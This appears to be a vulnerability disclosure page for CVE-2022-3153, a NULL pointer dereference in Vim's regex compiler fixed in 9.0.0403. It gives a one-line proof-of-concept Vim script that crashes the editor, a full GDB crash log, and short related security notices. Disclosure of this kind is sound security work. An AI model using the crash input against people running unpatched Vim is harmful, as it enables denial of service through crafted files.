Headline
CVE-2022-3153: Null Dereference in vim_regcomp() in vim
NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.0403.
Description:
Null Dereference in vim_regcomp() at vim/src/regexp.c:2716
#Vim Version:
git log
commit 8f7116caddc6f0725cf1211407d97645c4eb7b65 (HEAD -> master, origin/master, origin/HEAD)
Proof of Concept:
$ git clone https://github.com/vim/vim.git
$ cd vim/ && ./configure && make && cd src/
$ echo "call assert_fails('string',[{'0':0,'':''}])" > poc_null.dat
$ ./vim -S poc_null.dat
Segmentation fault (core dumped)
#GDB Log:
$ gdb --args ./vim --clean -S poc_null.dat
$ gef> r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff72245d1 in ?? () from /usr/lib/libc.so.6
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0xf4000000
$rbx : 0x0
$rcx : 0x0
$rdx : 0x4
$rsp : 0x007fffffffc2a8 → 0x005555557212f0 → <vim_regcomp+48> test eax, eax
$rbp : 0x0
$rsi : 0x00555555849f40 → 0x6e6c61003d23255c ("\%#="?)
$rdi : 0x0
$rip : 0x007ffff72245d1 → vmovdqu ymm0, YMMWORD PTR [rdi]
$r8 : 0x20
$r9 : 0x20
$r10 : 0x32
$r11 : 0x32
$r12 : 0x3
$r13 : 0x0
$r14 : 0x00555555990a80 → 0x00555555991070 → 0x0000000000000000
$r15 : 0x007fffffffc420 → 0x0000000000000000
$eflags: [zero CARRY PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
───────────────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffc2a8│+0x0000: 0x005555557212f0 → <vim_regcomp+48> test eax, eax ← $rsp
0x007fffffffc2b0│+0x0008: 0x0000555500000000
0x007fffffffc2b8│+0x0010: 0x005555559910c0 → "E492: Not an editor command: exen"
0x007fffffffc2c0│+0x0018: 0x0000000000000000
0x007fffffffc2c8│+0x0020: 0x00555555844c18 → "aAbBcCdDeEfFgHiIjJkKlLmMnoOpPqrRsStuvwWxXyZ$!%*-+<[...]"
0x007fffffffc2d0│+0x0028: 0x0000000000000000
0x007fffffffc2d8│+0x0030: 0x005555555f49a7 → <pattern_match+71> mov QWORD PTR [rsp], rax
0x007fffffffc2e0│+0x0038: 0x0000002000000114
─────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7ffff72245c3 shl eax, 0x14
0x7ffff72245c6 cmp eax, 0xf8000000
0x7ffff72245cb ja 0x7ffff7224974
→ 0x7ffff72245d1 vmovdqu ymm0, YMMWORD PTR [rdi]
0x7ffff72245d5 vpcmpeqb ymm1, ymm0, YMMWORD PTR [rsi]
0x7ffff72245d9 vpcmpeqb ymm2, ymm15, ymm0
0x7ffff72245dd vpandn ymm1, ymm2, ymm1
0x7ffff72245e1 vpmovmskb ecx, ymm1
0x7ffff72245e5 cmp rdx, 0x20
─────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "vim", stopped 0x7ffff72245d1 in ?? (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff72245d1 → vmovdqu ymm0, YMMWORD PTR [rdi]
[#1] 0x5555557212f0 → vim_regcomp(expr_arg=0x0, re_flags=0x3)
[#2] 0x5555555f49a7 → pattern_match(pat=0x0, text=0x5555559910c0 "E492: Not an editor command: exen", ic=0x0)
[#3] 0x55555578e634 → f_assert_fails(argvars=0x7fffffffc7e0, rettv=0x7fffffffc9d0)
[#4] 0x555555608d1d → call_internal_func(name=<optimized out>, argcount=<optimized out>, argvars=0x7fffffffc7e0, rettv=0x7fffffffc9d0)
[#5] 0x5555557b2915 → call_func(funcname=0x5555559910a0 "assert_fails", len=0xffffffff, rettv=0x7fffffffc9d0, argcount_in=0x2, argvars_in=0x7fffffffc7e0, funcexe=0x7fffffffca50)
[#6] 0x5555557b2bf2 → get_func_tv(name=0x5555559910a0 "assert_fails", len=0xffffffff, rettv=0x7fffffffc9d0, arg=0x7fffffffc9b8, evalarg=0x7fffffffcaa0, funcexe=0x7fffffffca50)
[#7] 0x5555557b32d0 → ex_call_inner(evalarg=0x7fffffffcaa0, funcexe_init=0x7fffffffca00, startarg=0x555555993b01 "('exen',[{'0':0,'':''}])", arg=0x7fffffffc9b8, name=0x5555559910a0 "assert_fails", eap=0x7fffffffce60)
[#8] 0x5555557b32d0 → ex_call(eap=0x7fffffffce60)
[#9] 0x55555562cb4d → do_one_cmd(cookie=0x7fffffffd730, fgetline=0x555555731050 <getsourceline>, cstack=0x7fffffffd010, flags=0x7, cmdlinep=0x7fffffffcdc0)
────────────────────────────────────────────────────────────────────────────────────────────
Impact
NULL Pointer Dereferences allow attackers to cause a denial of service (application crash) via crafted input.
Related news
Ubuntu Security Notice 6302-1 - It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possibly execute arbitrary code. This issue only affected Ubuntu 22.04 LTS. It was discovered that Vim did not properly perform bounds checks in the diff mode in certain situations. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.
Dell VxRail versions earlier than 7.0.450, contain(s) an OS command injection vulnerability in VxRail Manager. A local authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.
Gentoo Linux Security Advisory 202305-16 - Multiple vulnerabilities have been found in Vim, the worst of which could result in denial of service. Versions less than 9.0.1157 are affected.